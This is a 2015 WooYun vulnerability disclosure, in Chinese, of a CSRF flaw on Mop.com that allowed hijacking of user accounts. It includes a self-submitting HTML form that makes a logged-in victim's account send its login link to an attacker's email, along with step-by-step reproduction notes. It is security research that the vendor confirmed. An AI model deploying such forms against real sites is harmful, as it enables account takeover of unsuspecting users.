当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110774

漏洞标题:猫扑网配置不当,导致CSRF漏洞劫持登录任意用户

相关厂商:猫扑

漏洞作者: q601333824

提交时间:2015-04-28 09:33

修复时间:2015-07-27 13:02

公开时间:2015-07-27 13:02

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向第三方安全合作伙伴开放
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

为了和微博妹子聊天,昨天和BUG吧吧主借了新浪微博的大V帐号想去找妹子搭讪,但是事后想想算了,如果聊到最后,他突然把密码改了,妹子跟他跑了咋办...........嗯,太机智了

详细说明:


1.这次这个是第五个例子,都是因为对于快速用户的疏忽导致的
WooYun: 乐视网CSRF漏洞可重置任意用户密码 原理一样
2.用第三方帐号登录网站,然后会看到一个邮箱激活的地方,抓包

1.png


2.png


3.写成一个post表单

<html>
<body>
<form id="csrf" name="csrf" action="http://hi.mop.com/user/profile/sendActiveEmail" method="POST">
<input type="text" name="email" value="[email protected]" />
<script>
document.csrf.submit();
</script>
</body>
</html>


4.当用户的访问表单的时候,会往[email protected]发送一封激活邮箱的邮件
但是并不会更改用户的邮箱,而是直接登录用户帐号,所以说,只要对方访问表单,我就得到一个连接,然后就能不用密码登录他的帐号,如图(我用两个浏览器测试,因为效果比较明显)
①.现在是360极速浏览器登录帐号

5555555555.png


②.访问表单。

55555555555555555555555.png


③.打开火狐浏览器登录QQ邮箱,可以看到已经接受到邮件了,这个时候火狐浏览器的猫扑帐号没有登录,如图

99999.png


④.邮件里面的连接

666666666666666666666.png


⑤。访问连接,看吧,在访问连接的时候,火狐浏览器已经成功登录对方的帐号了

888888888888888.png


⑥.看吧,最后效果,就是,对方访问了CSRF连接,这个时候邮件把连接发到我的邮箱,我只要访问那个连接,就能登录对方帐号了.............................

0909090.png


-----------------------------------------------------------------------------------
以前提交的漏洞,加上这次,算起来应该是第五次了,都是因为忽视快了速登录导致的,虽然效果不一样,但是实现的原理基本是一样,利用的就是一些厂家对快速登录帐号的忽视

①. WooYun: 爱拍原创视频网csrf任意用户密码重置漏洞 (这个是因为快速登录之后接口校验不严格)
②. WooYun: 百度传课物理路径泄漏 (这个也是因为快速登录接口校验不严格)
③. WooYun: 乐视网CSRF漏洞可重置任意用户密码 (这个额也是因为快速登录接口校验不严格)
④。 WooYun: 凤凰网首页XSS Rookit可向用户推送广告(影响多个分站) (这个也是因为对快速登录校验不严格,随便创建无用的数据)

漏洞证明:

1.漏洞证明看上面,
2.审核人的测试的时候可以改成自己的邮箱测试

3.还有就是,一个邮箱,可以接收好几个帐号的激活邮件,意思就是说,只要我把这个发布到社区,邮件能拿到很多帐号(我是好人,不干这种事),如图(这些是我测试帐号,为了证明一个邮件能接受好多帐号的邮件,图上就已经接受了两个了)

524434344.png

修复方案:


①.还是那句话,不要小看快速登录帐号了
②.修复你们比我懂
③.顺便求高点的rank,一直都是5分,6分的.....=_=....

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-04-28 13:00

厂商回复:

谢谢,非常感谢!

最新状态:

暂无